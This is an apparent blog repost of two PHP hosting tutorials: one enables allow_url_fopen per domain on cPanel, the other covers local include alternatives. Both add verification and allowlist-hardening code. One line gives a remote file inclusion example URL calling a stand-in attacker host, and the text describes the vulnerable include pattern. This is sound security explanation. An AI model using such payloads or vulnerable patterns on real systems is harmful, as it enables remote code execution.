Wednesday, July 13, 2011

How to enable allow_url_fopen for a single domain on a cPanel server?

SkyHi @ Wednesday, July 13, 2011

The way to enable allow_url_fopen differs between a phpsuexec server and a non-phpsuexec server. For security reasons the option is usually disabled server-wide; however, you can turn it on for a single domain/account in case it is required.

Here is how it needs to be done.
  • On a non-phpsuexec server:
Go to the /usr/local/apache/conf/ directory:
# cd /usr/local/apache/conf/
Check whether a “userdata” directory exists there. If not, create the “userdata/<username>” directory and then the file allowurl.conf inside it, so the complete path looks like:
# pico /usr/local/apache/conf/userdata/<username>/allowurl.conf
and add the following to the file:
<IfModule mod_php5.c>
 php_admin_value allow_url_fopen On
 php_admin_value allow_url_include On
</IfModule>
Note that allow_url_include is a separate directive from allow_url_fopen: it lets include() and require() load code from a URL, which is exactly the behaviour the exploitation example at the end of this page relies on, so only turn it on if the account actually needs it.
Now, edit the Apache configuration file and scroll down to the VirtualHost entry for the domain. Include the path of the file created above, as shown below:
Include "/usr/local/apache/conf/userdata/<username>/allowurl.conf"
Save the file and rebuild the Apache configuration:
# /usr/local/cpanel/bin/apache_conf_distiller --update
# /usr/local/cpanel/bin/build_apache_conf
# /scripts/restartsrv httpd
This will enable allow_url_fopen for that domain.
  • On a phpsuexec or suPHP server:
On a suPHP-enabled server, turning on allow_url_fopen in the VirtualHost entry won't work, since PHP no longer runs as an Apache handler.
In such a case, copy the server's global php.ini into the domain's directory, for example public_html (php.ini must be copied to the directory where the script that needs allow_url_fopen resides):
# cp /usr/local/lib/php.ini /home/<username>/public_html/
Edit the new php.ini file and enable allow_url_fopen in it:
allow_url_fopen = On
Save the file. That's it.
BTW, replace “<username>” with the actual username of the domain wherever stated.
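Whichever of the two methods you used, the only reliable way to confirm the change is to ask PHP itself from inside the affected domain, because the mod_php and suPHP paths apply the setting differently. The following verification script is an added example, not part of the original post: place it in the domain's document root, request it once through the web server, and remove it afterwards. It reports which php.ini was loaded (which directly confirms the per-directory php.ini method under suPHP) and the effective values of both directives.

```php
<?php
// Added verification script (not from the original post). Request it once
// from the domain whose settings you changed, then delete it.

// Collect the effective configuration as seen by this request.
function allow_url_status()
{
    return array(
        'sapi'              => PHP_SAPI,
        // Under suPHP with a php.ini in public_html this should show that file;
        // under mod_php it shows the global php.ini while the per-vhost
        // php_admin_value still overrides the directive values below.
        'php_ini_loaded'    => php_ini_loaded_file() ? php_ini_loaded_file() : '(none)',
        // ini_get() returns "1"/"" (or "On"/"Off"); normalise to a boolean.
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    );
}

header('Content-Type: text/plain');
$status = allow_url_status();
foreach ($status as $key => $value) {
    printf("%-18s %s\n", $key, is_bool($value) ? ($value ? 'On' : 'Off') : $value);
}

// allow_url_include is the directive that lets include()/require() pull code
// from a URL; flag it explicitly so it is not enabled by accident.
if ($status['allow_url_include']) {
    echo "\nWARNING: allow_url_include is On; include()/require() will accept URLs.\n";
}
```

If the script reports allow_url_fopen as Off after the mod_php procedure, the usual cause is that the Include line did not survive the distiller/rebuild step; check the generated httpd.conf for the userdata path before restarting again.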

REFERENCES
http://linuxhostingsupport.net/blog/how-to-enable-allow_url_fopen-for-a-single-domain-on-a-cpanel-server


The PHP option allow_url_fopen normally allows a programmer to open, include or otherwise use a remote file via a URL rather than a local file path. For security reasons, AUSWEB has disabled this feature; however, a feature-rich alternative exists in the form of the bundled cURL library.

Server-Side Includes
Many developers include files by pointing to a remote URL, even if the file is within the local system. For example:
<?php include("http://example.com/includes/example_include.php"); ?>
With allow_url_fopen disabled, this method will not work. Instead, the file must be included with a local path, and there are three methods of doing this:
  1. By using a relative path, such as ../includes/example_include.php.
  2. By using an absolute path (also known as relative-from-root), such as /home/username/example.com/includes/example_include.php.
  3. By using the PHP environment variable $_SERVER['DOCUMENT_ROOT'], which returns the absolute path to the web root directory. This is by far the best (and most portable) solution. The Example section below shows the environment variable in action.

Processing Differences (and passing variables to an included file)
It is worth mentioning that the alternative solutions presented here change the way include() is handled. The alternative solutions all return the PHP code from the included page, whereas the now-unavailable remote URL method returns the output of the included page. One consequence is that you cannot pass a querystring using the alternative solutions; instead, you define the variables locally before performing the include:

Example
To achieve the effect of this:
<?php include("http://yourdomain.com/includes/example_include.php?var=example"); ?>

You must instead use this:
<?php
$var = "example";
include($_SERVER['DOCUMENT_ROOT']."/includes/example_include.php");
?>

Example exploitation
If allow_url_fopen is enabled, a script that passes a querystring variable straight to include() can be exploited simply by changing the value of that variable to a URL (remote file inclusion):

http://yourdomain.com/index.php?page=http://crackerscum.net/evilscript.txt
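The URL above implies an index.php that hands the page parameter straight to include(). As an added example (not code from the original tutorial), the block below shows that vulnerable pattern in a comment beside a hardened replacement that maps the request value onto a fixed allowlist of local files built from $_SERVER['DOCUMENT_ROOT'], the include method the tutorial recommends. The file names home.php, about.php and contact.php are assumed for illustration.

```php
<?php
// Added example (not from the original tutorial).
//
// Vulnerable pattern implied by the URL in the text: the request parameter is
// used directly as the include path.
//
//   include($_GET['page']);   // with allow_url_fopen/allow_url_include on, a URL
//                             // value loads remote code; even with them off, a
//                             // local path still exposes files on the server.
//
// Hardened version: the user-supplied string is only ever used as a lookup key.

function resolve_page($requested)
{
    // Allowlist of request value => file under includes/ (names assumed).
    $pages = array(
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    );

    // Anything not in the allowlist falls back to the default page; the raw
    // input never becomes part of the path.
    $key = isset($pages[$requested]) ? $requested : 'home';

    return $_SERVER['DOCUMENT_ROOT'] . '/includes/' . $pages[$key];
}

// Cast to string so an array-valued parameter (?page[]=x) cannot reach isset().
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
include resolve_page($page);
```

Keeping the server-wide allow_url_fopen/allow_url_include setting off limits the damage from this class of bug to local files, but the allowlist is what actually removes the vulnerability: it works the same regardless of how the hosting server has those directives configured.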
REFERENCES
http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/